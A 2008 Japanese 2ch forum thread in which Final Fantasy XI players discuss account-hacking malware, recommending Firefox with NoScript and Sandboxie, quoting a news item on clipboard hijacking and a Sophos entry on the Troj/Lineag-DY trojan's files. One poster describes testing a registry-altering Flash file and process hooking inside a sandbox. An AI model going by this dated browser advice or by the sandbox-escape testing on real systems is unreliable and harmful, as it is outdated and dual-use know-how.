922 名前：既にその名前は使われています：2008/08/20(水) 01:14:17 ID:jWE8lAsS: >>876
バックアップと被害の時間がずれている以上、絶対厳密に同じには出来ないわけで、
対応するのが大変すぎるというか、無理だから。
923 名前：既にその名前は使われています：2008/08/20(水) 01:14:47 ID:oHCLEqq8: >>920
FirefoxのDLはここ↓
Mozilla Japan - Firefox(Ver.3.0.1) = ttp://mozilla.jp/firefox/

NoScriptのDLはここ↓(FirefoxのAdd-onで紹介されてた気もしますけど)
NoScript - NoScript(Ver.1.7.8) = ttp://noscript.net/

導入の仕方は、検索を日本語ページで絞ってみるといろいろ出てきますよ

Firefox+NoScriptで、IFRAME不許可にして罠サイトに突撃してなにも
なかったから大丈夫なはずです
924 名前：既にその名前は使われています：2008/08/20(水) 01:50:55 ID:zFz5TVI8: そろそろテンプレ提示に怪しいURL入れる業者が出てくるかもな
925 名前：ゴブクラ”管理”者 ◆1Ebj/BJ5c6 ：2008/08/20(水) 01:57:06 ID:MEHqX9D6: >>910
原因がわかりましたので報告。
以前納品提携していたFFXI data bankのURLがらみでした。

サイトがなくなったのに納品データを飛ばしていたことと、
該当のドメイン（ffxi-databank■net）が業者に取られたためのようです。

大丈夫だとは思いますが、心配な方はウィルススキャン等を行ったほうが
いいかと思われます。

すでに該当する部分は外しましたので、今後利用する分には問題ありません。
926 名前：既にその名前は使われています：2008/08/20(水) 02:00:32 ID:oHCLEqq8: >>925
素早い対応、ありがとうございます
927 名前：既にその名前は使われています：2008/08/20(水) 02:07:54 ID:4iRGMCeP: >>925
素早いご対応ありがとうございます

掲示板に書こうかと思いまして、
ヘッダ等調べるために納品報告ボタンを押していたら、
PG2が反応しなくなったので>>910の現象は思い違いかと思ってました。
あと、検証のためとは言え、何度も納品報告ボタンを押して申し訳ないです。
928 名前：既にその名前は使われています：2008/08/20(水) 02:13:44 ID:oHCLEqq8: IFRAMEに関して、ウィルス絡みの記事はこれがいいかな

ttp://internet.watch.impress.co.jp/cda/news/2007/12/19/17941.html

ただ、IFRAMEを利用した罠でも、罠の元になる部分はスクリプトなので(IFRAMEは単なる
フレーム表示タグなので、それ自体がスクリプトのような動作をする要素はないはずです)
スクリプトそのものを確実に不許可にしておけば問題はない気がしますけど・・・

ん～・・・認識が間違っていたら指摘してください
929 名前：既にその名前は使われています：2008/08/20(水) 02:24:38 ID:oHCLEqq8: あ～・・・

バッファオーバーフローによる誤動作にはスクリプトに関係しないのかな・・・
ってことはやっぱりIFRAMEそのものをを不許可にできる環境がいいのか

やっぱりFirefox+NoScript推奨です
930 名前：既にその名前は使われています：2008/08/20(水) 02:31:41 ID:ETLZZMwk: >>925
乙。こうやって対応報告してもらえるとすごく助かるなｗ

sandboxie使ってなかったもんで試してみたよー。
パッチ一切当ててない砂箱＋IE6＋脆弱持ちFlashPlayerでレジストリ変更ｊｓコード食わせるｓｗｆ読み込んでみたんだけど。
手を変え品を変えやってみて、砂箱が保持するレジストリ情報やファイル置き換えはされたけども、砂箱の外には今のところ手だせてないな。
まだテスト深度も浅いし、もっともっと追試してからじゃないと安全です！っては言えないけどｗ
とりあえず俺は、砂箱内で動かしたブラウザでレジストリ変更されたとしても、外のシステムに影響を及ぼせるような穴は今のところ見っけれてないなー。
ただし、垢パクマルウェアに感染した状態の砂箱内でPOL起動すると当然ID/PASS送信するだろうからね。そこは注意。POLが動くか解らないけどもｗ

サイト見て回るのには砂箱ブラウザで。んで使い終わったら砂箱内データ消去なりすれば、生で見にいくよりは安全じゃないかなーとは思うよー。
931 名前：既にその名前は使われています：2008/08/20(水) 03:11:10 ID:oHCLEqq8: sandboxie導入に、少し気になったので検索

Visual C++ Q & A掲示板という掲示板からの記事(少し古いですが)

厳密にはWin32APIでは100%レジストリやIEの履歴などを一切汚さないブラウジングは
実現できないらしいのですが、そのあたりどうなんでしょう
932 名前：既にその名前は使われています：2008/08/20(水) 03:20:15 ID:oHCLEqq8: どうやらなんにでも安全ではないようです
こんな記事も見つけました

「Sandboxieの性質上メモリ、ブートセクタ感染などのタイプは対処できないと思います。」

いちおう、導入にはご注意を
933 名前：既にその名前は使われています：2008/08/20(水) 03:29:25 ID:gwFLMhFu: >>925
あれ？・・・ってことはFFXI data bankはもう死んでるの？
たしかにグーグル先生でトップに来たURLをソースチェッカーでみたら４０４で返ってくる。
でも、augseで見るとHPじたいは残ってるっぽい・・・なんじゃこりゃ？
934 名前：既にその名前は使われています：2008/08/20(水) 03:36:09 ID:Kx/Xfg2m: キャラデータ復旧申請後
キャラ復活メールくる間に、むこうから連絡くる？
本人確認が完了したので復旧作業を開始しますとか
935 名前：既にその名前は使われています：2008/08/20(水) 03:39:09 ID:zFz5TVI8: >>934
こない。
936 名前：既にその名前は使われています：2008/08/20(水) 03:39:58 ID:ETLZZMwk: >>931
>厳密にはWin32APIでは100%レジストリやIEの履歴などを一切汚さないブラウジングは
>実現できないらしいのですが、そのあたりどうなんでしょう
それは無理かなー、Sandboxie自体HKUS内にレジストリをミラーリングしてそいつを使うみたいだからレジストリを100％汚さないっていうのは出来てないな。
ここらへんはHIPSで検知されるから挙動を見てみると解りやすいかもねｗ

>>932はシステム自体がすでに感染してるケースじゃないのかなあ。
システムでメモリを舐めるようなマルウェアに感染してそれが動いていた場合、砂箱の外から中身を見る手段はあると思うよ。ブートセクタ云々は、その名前の通りだけど。
>>930でいってるのはあくまでクリーンな状態のPCでブラウジングする場合の話。
クリーンな状態であって砂箱＋ブラウザでもしマルウェアをダウンロードしてしまったとしても、砂箱内で感染状態にはなるだろうけどブラウズ終わったら削除しちゃえば比較的安全だよねってこと。
ダウンロードした時点でサービスなりで起動かけられてPOLのメモリやれレジストリ舐めにいくっていうなら話は別かもしれないけど
少なくとも、自分で手動リカバーかけない限り砂箱外にファイル吐かせたりレジストリを食わせたりってのは俺には出来て無いなあｗ
937 名前：既にその名前は使われています：2008/08/20(水) 03:53:27 ID:oHCLEqq8: >>936
ありがとうございますm(_ _)m

わたしも使おうかと思っていろいろ調べて、なにかあったときに対処が
できなさそうだな～って思って、結局は躊躇でした
わかってる人が使うなら安全でも(使う「から」安全でも、かな)、ただ
安全だからと導入することへの危惧感がどうにもこうにも・・・

と言ってる間に、ffxi-databank■netを見に行ってる途中で危険サイト指定の
「208●73.210.32」に続いて中国IPの「219●243.201.17」を弾きました

なんだこれ・・・
938 名前：既にその名前は使われています：2008/08/20(水) 03:55:11 ID:Kx/Xfg2m: >>935
こないのか、、、昼間とか仕事だから電話かかってきてもとれんし
てか来ないのはそれはそれでダメじゃね？
本人確認完了くらいはしらせてほしいものだが、、、
939 名前：既にその名前は使われています：2008/08/20(水) 04:17:32 ID:97RurTrd: >>938
そんな事してたらどれだけオペレーター要ると思って
いつ在宅してるか分からない人間に電話するオペレータ増やすくらいなら電話対応増やす方がいいだろ

オペレータ一人雇うのも馬鹿にならないんだぜ？
940 名前：既にその名前は使われています：2008/08/20(水) 04:17:53 ID:zq6TFmWA: POLだけに限った話でいえば、今後の脅威としてdll食わせて起動時に常駐しますってんじゃなくて実行ファイルで即座にPOLのレジストリキーやらディレクトリ舐めにいくーとか手法が先祖帰りした場合。
設定でPOLのディレクトリとレジストリキーをアクセス排他してやればいいんじゃないかなー。まだ試してないけどｗ

それとちょっと怒られるかもしれないけど、POLのプロセスをHookするプログラムを砂箱内で動かして砂箱外のPOL掴めるか試してみたんだけど確かにメモリ上に展開されたナニは読めないこともないねー。
ただこれも、砂箱を削除してからPOLのログインを行えば上に書いたような実行ファイル形式で即座に動いちゃいます！みたいなナニにも運用上対応はでけるかしら。
俺もまだSandboxieは触り始めたばかりだし、もっとスマートな方法あるかもだけどｗ
941 名前：既にその名前は使われています：2008/08/20(水) 04:24:55 ID:zq6TFmWA: 砂箱っていうのは、たとえばうっさんくさいフリーウェアとかを試したいときにシステム汚したくないけど試してみたい！ってときにテスト環境として使う事が多いものだし。
砂箱外のメモリ展開された情報も見に行けるものが多いと思うけど。
そのソフトが一体なんの為のものなのか、どのような挙動をするのか、どのようなケースに有効なのか。ってのを見極めて使う分には割合に有効なんじゃないかねｗ
>>937のような姿勢は正しいとは思うよｗ
942 名前：937：2008/08/20(水) 04:25:32 ID:oHCLEqq8: 調べた結果、中国IPはPlanet-Labでしたm(_ _；m

危険サイトブロック直後に中国IPブロックだったから焦っちゃった
タイミングよすぎ・・・
943 名前：937：2008/08/20(水) 04:29:07 ID:oHCLEqq8: >>941
もうちょっと勉強して、自分にも使えそうになったら試してみます
まだまだPlanet-Labさえ調べないと安心できないレベルなので
当分は先になりそうですm(_ _)m
944 名前：既にその名前は使われています：2008/08/20(水) 05:07:53 ID:oHCLEqq8: 次スレ、立てておきます
945 名前：既にその名前は使われています：2008/08/20(水) 05:48:47 ID:oHCLEqq8: 次スレ

●● RMT業者の垢ハックが多発している件37 ●●
http://changi.2ch.net/test/read.cgi/ogame/1219176652/
946 名前：既にその名前は使われています：2008/08/20(水) 09:05:07 ID:BXNZrbN+: 保守
947 名前：既にその名前は使われています：2008/08/20(水) 13:44:48 ID:6FDtoe8J: ハックされた人に一番聞きたいのはPCにどんな兆候が現れたか
なんだがあんまり報告無いね
何の症状も出ないって言うのは結構珍しいような気がする
948 名前：既にその名前は使われています：2008/08/20(水) 14:10:51 ID:J3FuZfBg: そんなのに引っ掛かるまぬけに期待するだけ無駄。
949 名前：既にその名前は使われています：2008/08/20(水) 14:18:17 ID:ZkP/6/3S: たいてい感染している奴は気づいてもいない
950 名前：既にその名前は使われています：2008/08/20(水) 14:42:54 ID:n7sRgRj4: そもそもツール経由感染が一切無いわけねーのにそういうのの報告皆無だよな。
つまり大半がツール使った結果感染したけど、
それを言うわけにはいかないから詳細書かないんじゃねえの？
951 名前：既にその名前は使われています：2008/08/20(水) 14:52:57 ID:ejwd3G9J: >>950
イメージで話しているだけなんだろうが、わざわざFFのツール作って広めてからハックするよりも
既存の穴を埋めて無いやつをハックするほうが楽だろｗ
全盛期には日に1000パス抜かれてたらしいし
952 名前：既にその名前は使われています：2008/08/20(水) 14:57:38 ID:ucg/NGii: http://headlines.yahoo.co.jp/hl?a=20080820-00000042-zdn_ep-sci

これも新たな火種にならんかな？
953 名前：既にその名前は使われています：2008/08/20(水) 14:58:01 ID:v9YB+1nT: こんな記事を発見
URLをコピペしたら悪質サイトに――乗っ取り被害が続出

＞どんなサイトのURLをコピーしても、悪質サイトのURLがペーストされてしまう――。
＞テキストなどのコピー＆ペーストに使われるメモリ領域「クリップボード」が乗っ取られる被害が続出している。
＞被害報告はWindows、Macユーザーの両方から寄せられているという。セキュリティ企業の英 Sophosが8月19日のブログで伝えた。

＞Sophosによると、ネットの掲示板には被害に遭ったというユーザーからの報告が相次いでいる。
＞「URLを選択して“ctrlとc”でコピーし、ペーストしようとするたびに、ウイルスと思われるリンクが出てくる」
＞「例えば、http://www.google.com/というURLをWindowsのクリップボードにコピーして、ペーストすると問題のURLになる。
＞ウイルス対策ソフトでスキャンしても何も見つからない」などの声が寄せられているという。

＞攻撃者はトラフィックを稼ぐ狙いでユーザーのクリップボードを上書きし、自分たちのサイトのURLをペーストさせているとSophosは分析。
＞Javascriptなどのスクリプト言語を使って、自動的にデータをシステムのクリップボードにコピーする技術はよく知られているという。

＞今回の現象は、被害者が正規サイトを閲覧した後に発生しており、不正スクリプトを仕込んだFlashが使われているもよう。
＞広告が汚染された可能性もあるという。現時点でクリップボードを上書きしている悪質なURLは2種類あり、
＞いずれも被害者のマシンで偽のシステムスキャンを実行するサイトへつながるとSophosは伝えている。

http://headlines.yahoo.co.jp/hl?a=20080820-00000042-zdn_ep-sci
954 名前：既にその名前は使われています：2008/08/20(水) 15:02:33 ID:v9YB+1nT: ついでにNo Script 1.7.9がきたよあげ
955 名前：既にその名前は使われています：2008/08/20(水) 15:24:35 ID:rFdRuFlp: とりあえず、解約した。実害鯖移動の料金。
明日警察に被害届出す予定。

KcrnaeghDrv.dllってのあるか調べた方がいいよ。
これでやられた。どこで感染したのか分からない。
956 名前：既にその名前は使われています：2008/08/20(水) 15:31:50 ID:GLRsnmCy: ウイルスやスパイウェアのカテゴリ

Type Trojanタイプトロイの木馬

Troj/Lineag-DY is a Trojan for the Windows platform. ） Troj / lineag - dyは、トロイの木馬は、 Windowsプラットフォームです。

When Troj/Lineag-DY is installed the following files are created:時） Troj / lineag - dyがインストールさは、以下のファイルが作成されます：

<Current Folder>\das.bat <currentフォルダ> \ das.bat
<System>\KcrnaeghDrv.dll <system> \ kcrnaeghdrv.dll

The file KarnaeghDrv.dll is also detected as Troj/Lineag-DY.ファイルとして検出さもkarnaeghdrv.dll ） Troj / lineag - dyです。

The Trojan also may delete the Windows HOSTS file.このトロイの木馬Windowsのhostsファイルを削除しても5月です。
957 名前：既にその名前は使われています：2008/08/20(水) 15:32:50 ID:msQxatJ+: No.Script1.7.9更新アゲ

・・・どうやって更新すんのか四苦八苦中ヽ(；´ω｀)ノ
958 名前：既にその名前は使われています：2008/08/20(水) 15:32:55 ID:GLRsnmCy: 翻訳して拾ったのはご愛嬌だが、これかな？
959 名前：既にその名前は使われています：2008/08/20(水) 15:38:42 ID:jc0scvPp: >>957
「ツール」＞「オプション」＞「一般」のところの「アドオンを管理」
＞「更新を確認」ボタン(左下にあります)＞Firefoxを立ち上げ直し

で、1.7.9になります
960 名前：既にその名前は使われています：2008/08/20(水) 15:57:42 ID:jc0scvPp: >>957
いけない、ひとつ抜けてたけど大丈夫だったかな

「ツール」＞「オプション」＞「一般」のところの「アドオンを管理」
＞「アドオン」のところの「拡張機能」＞「更新を確認」ボタン(左下にあります)
＞Firefoxを立ち上げ直しで更新が反映されます

「アドオン」の窓の「拡張機能」が抜けてました
961 名前：既にその名前は使われています：2008/08/20(水) 18:00:19 ID:d2NLdkWv: Firefox 3のSSL証明書ポリシー変更で閲覧不能サイト増加の可能性
http://internet.watch.impress.co.jp/cda/news/2008/08/20/20607.html
962 名前：既にその名前は使われています：2008/08/20(水) 18:33:59 ID:2thKb8D1: >>960
俺も更新知ってやろうかと思ったんですが、
「一般」の所にアドオン関係ないな、、、もしかしてFirefox3かな？

以前ちょっとだけ３にしたけど何か慣れなくて前のに戻したけど
セキュリテー的には３のほうがいいのかな
963 名前：既にその名前は使われています：2008/08/20(水) 18:36:01 ID:cmw/bcHU: テー
964 名前：既にその名前は使われています：2008/08/20(水) 18:37:38 ID:JSmF4rEC: あー俺もセキュリてー
965 名前：既にその名前は使われています：2008/08/20(水) 19:05:24 ID:jc0scvPp: >>962
わたしのはFirefox3です
2を使ってた期間がすごく短いので、2と3の違いがほとんどわかりません
ブラウザの更新はセキュリティの基本だと教わりましたので、みなさんも
3を使われているものと思ってお話してましたm(_ _)m
966 名前：既にその名前は使われています：2008/08/20(水) 19:06:11 ID:RQzjwDNs: 心配性なのですが、相談に乗ってもらいたいです。

2日に1度恒例で行ってるノートンのスキャンを行い仕事に行き、
帰ってくると、スキャンは完了してたのですが、ノートン自身に問題が確認されましたって出てて、
修復するも、完了手前で「応答なし」状態になり、強制終了させて、再度アップデートとスキャンを行い、
特に問題も無く完了し、

POLログイン時にPOL-0019、サーバーが見つかりませんてのが出て、リトライすると正常にログイン出来たのですが、
有志さんたちのブログ等で「ログイン時にエラーが発生する」など見たことがあり、すごい心配になって
一先ずLANぶっこ抜いて、レジストリが書き換えられてないか、system32にある例のファイルが無いか等確認して、
特に問題点も見つからず、
もう一度POLにログインしようとすると、また同じPOL-0019が出て、リトライで問題なくログインできました。

ファイヤーウォールやライブアップデート等のセキュリティは最新を維持するようにしてます、
WEBブラウザはOperaを使ってます。

これは単なるサーバーエラーだけなのでしょうか･･･？
このご時勢、ちょっとしたエラーが心配なので･･･
967 名前：既にその名前は使われています：2008/08/20(水) 19:08:04 ID:l3MFw8WH: Fireｆox2なら

ツール＞アドオンでNoScriptのとこクリックして
窓の左下にある”更新を確認”押せばOK
968 名前：既にその名前は使われています：2008/08/20(水) 19:09:12 ID:2thKb8D1: >>965
やっぱり３のほうでしたか。ありがとうございます。
更新されてるなら自分もちょっと見てみよう
969 名前：既にその名前は使われています：2008/08/20(水) 19:09:50 ID:KdlX0Si2: ジョブの調整について (2008/08/20)

次回バージョンアップでは、からくり士を始めとしていくつかの追加・調整を予定しています。

詳しくは『こちら』をご覧ください。

http://www.playonline.com/pcd/topics/ff11/detail/3578/detail.html
970 名前：既にその名前は使われています：2008/08/20(水) 19:10:35 ID:2zIppzDc: >>966
まずはググる
それでもわからなければクリーンインストール
もし抜かれてるならケーブルぶっこぬいた所で意味なしじゃね？
971 名前：既にその名前は使われています：2008/08/20(水) 19:11:19 ID:2thKb8D1: >>967
あ、更新できました！　ありがとうございます
972 名前：既にその名前は使われています：2008/08/20(水) 19:25:49 ID:GwT9rzgL: >>950
マジレスすると純正厨なんでFFでツールは一切使ってない。

あと、ウィルス対策ソフトもガッチガチに使ってる。
なのに垢ハックされるんですが（´Д⊂）
もうこれは運なのか・・・そうなのか・・・。
973 名前：既にその名前は使われています：2008/08/20(水) 19:29:38 ID:PxSJC9wH: >>972
そういう人こそ、環境を教えて欲しい。
974 名前：既にその名前は使われています：2008/08/20(水) 19:49:31 ID:SRPOCrWK: うめついでに　fx3.0.1でも　ツール＞アドオン
上の4つのアイコンから　拡張機能　を選ぶと　今入ってるアドオンの一覧が出て
ウィンドウ左下の「更新を確認」で　更新があればそこからインストールできますよん。

ID:GwT9rzgLは　アカハック被害者さんですか？
＞マジレスすると純正厨なんでFFでツールは一切使ってない。
＞あと、ウィルス対策ソフトもガッチガチに使ってる。
とのこと　もしテンプレで報告済みでしたら　スレとレス番教えていただけませんか？
報告なさってないようでしたら　973氏の言うように
次スレのほうでご報告をお願いします。
次スレ
●● RMT業者の垢ハックが多発している件37 ●●
http://changi.2ch.net/test/read.cgi/ogame/1219176652/
975 名前：既にその名前は使われています：2008/08/20(水) 19:52:07 ID:qV4vkOct: むしろツーラーの方がきちんと対策していると思われる。
976 名前：既にその名前は使われています：2008/08/20(水) 19:58:31 ID:LUiY7/XY: さあ鬼（>>972）の首をとるゲームが始まったw
977 名前：既にその名前は使われています：2008/08/20(水) 20:40:15 ID:jc0scvPp: >>972
FlashPlayerのバージョンを教えてください
バージョンテストはテンプレ(>>12の8)にあります
978 名前：既にその名前は使われています：2008/08/20(水) 20:41:34 ID:msQxatJ+: >>959
うおおおおおありがとう！できた！
979 名前：既にその名前は使われています：2008/08/20(水) 20:46:17 ID:jc0scvPp: >>978
いえいえ(*＾＾*ゞ

というか「ツール」＞「アドオン」の「拡張機能」＞「更新を確認」の方法を
知らなくて、ややこしい説明になってました、ごめんなさいm(_ _)m

「ツール」＞「オプション」に行く前に気が付けと・・・＞わたし
980 名前：既にその名前は使われています：2008/08/20(水) 22:37:41 ID:ER4+mSMT: どんな対応策とってたかってのもあるが
「これだけやってるから大丈夫＾＾」って思うのが一番危ないんじゃないのか。

中国製アンチウィルスｗとかマカフィーでがちがちにかためてました、とかそういうオチか？
981 名前：既にその名前は使われています：2008/08/20(水) 22:42:53 ID:HU9f2PUA: 質問です。PCやネット環境の対策とは別として（ここでいろいろ言われてるので）
変なものググらない。のと、FFのアドはこまめに変更する
ってのは効果あると思いますか？ご意見ください
982 名前：既にその名前は使われています：2008/08/20(水) 22:43:31 ID:HU9f2PUA: FFのパスでした・・・orz
983 名前：既にその名前は使われています：2008/08/20(水) 22:52:13 ID:eoZuZs1Z: 変なものはググらない？HPごと改竄されるのに？
984 名前：既にその名前は使われています：2008/08/20(水) 22:56:39 ID:ynd2wi9S: 「変なもの」に何が含まれるか分からないけど
ＦＦの攻略情報をググるつもりなら変なものより危ないかも（ＦＦに関しては）
ウイルスが侵入してしまったら、それを取り除かない限りパスの変更も効果が無いけど
健全な環境で普段からパスをちょくちょく変えるのは、予防として悪いことじゃないと思う
985 名前：既にその名前は使われています：2008/08/20(水) 22:57:05 ID:HU9f2PUA: >>983
HPそのものにウィルスついてるって事でしょうか？
986 名前：既にその名前は使われています：2008/08/20(水) 22:58:34 ID:6FDtoe8J: 981みたいなこと言ってる時点でヤバそうなのが俺にもわかるわｗ
最近よくこのスレで見る釣りだかマジだか良く分からん自称初心者と同じ人か？
987 名前：既にその名前は使われています：2008/08/20(水) 22:59:01 ID:jc0scvPp: >>981
わたしも>>984さんに同意ですね

というか、ウィルスに感染する仕組みをちゃんと理解できていれば
前もって対策を取ることができるはずですから、検索したサイトに
行くことがすなわち危険であるとも言えない部分もあります

いまいちばん怖いのは、安全だと思って行ったサイトでウィルスに
感染することなのかもしれません
988 名前：既にその名前は使われています：2008/08/20(水) 22:59:35 ID:6FDtoe8J: >HPそのものにウィルスついてるって事でしょうか？

このスレ読んでねえじゃん・・・
989 名前：既にその名前は使われています：2008/08/20(水) 23:00:39 ID:HU9f2PUA: >>984
変なのも＝FF関連のサイトってことです。
そうですか、見るサイトも　ある程度決めといたほうがいいか・・。
990 名前：既にその名前は使われています：2008/08/20(水) 23:02:14 ID:jc0scvPp: >>989
>見るサイトも　ある程度決めといたほうがいいか・・。

違います

ウィルスを拾わない環境でネットしてください
ある程度決めたサイトがいつも安全だとは限りません
991 名前：既にその名前は使われています：2008/08/20(水) 23:03:19 ID:xuZXXDsR: とりあえずテンプレにあるこの初心者用のサイトを一生懸命読んでくれ。
tp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/

もはやどのサイトも安全って事は無いんだ。
怖いならＦＦで使わないPCでぐぐってくれ。
992 名前：既にその名前は使われています：2008/08/20(水) 23:04:17 ID:JwQj/c2U: FF11が最大のウイルスでした。
ウィルスとウイルス
君ならどっち？
993 名前：既にその名前は使われています：2008/08/20(水) 23:07:41 ID:ETLZZMwk: >>992
むしろユーザがウィルスでしたって話だけどなｗ
994 名前：既にその名前は使われています：2008/08/20(水) 23:09:54 ID:jc0scvPp: >>992
ういるす(ラテン語)　が正しいっぽいですね・・・ｗ

うぃるす　で辞書検索しても　ういるす　に当たります

もう　びーるす(ドイツ語)　でいいじゃん・・・ｗ
995 名前：既にその名前は使われています：2008/08/20(水) 23:55:20 ID:GWG/Z4YK: ブルースウィリス？ウィルス？新聞やTVジョン等で記載が違うの不思議！
って・・・失礼・・・
996 名前：既にその名前は使われています：2008/08/21(木) 00:01:58 ID:ki1aPwBG: うめちゃうにゃ
997 名前：既にその名前は使われています：2008/08/21(木) 00:02:47 ID:ki1aPwBG: うめちゃうにゃ
998 名前：既にその名前は使われています：2008/08/21(木) 00:03:25 ID:ki1aPwBG: うめるのにゃ
999 名前：既にその名前は使われています：2008/08/21(木) 00:03:59 ID:ki1aPwBG: てか　思考停止してる人多すぎると思うにゃ
1000 名前：既にその名前は使われています：2008/08/21(木) 00:04:30 ID:ki1aPwBG: ！　かんじはよめないにゃ
1001 名前：１００１：Over 1000 Thread: 　 === Area: Live Networkgames@2ch http://changi.2ch.net/ogame/ ===

　　　　　　／/
　　　　／　.人　　　　　あ、ぽこたんインできないお！
　　　 / 　（＿_）ﾊﾟｶ
　　　/ ∩(＿___）　　　　　　このスレッドは１０００を超えたお。。。
　　 /　.|（・∀・）＿　　　　もう書けないので、新しいスレッドにインするお！
　　/／ |　　　ヽ／
　　"￣￣￣"∪

全部最新50

DAT2HTML 0.35b Converted.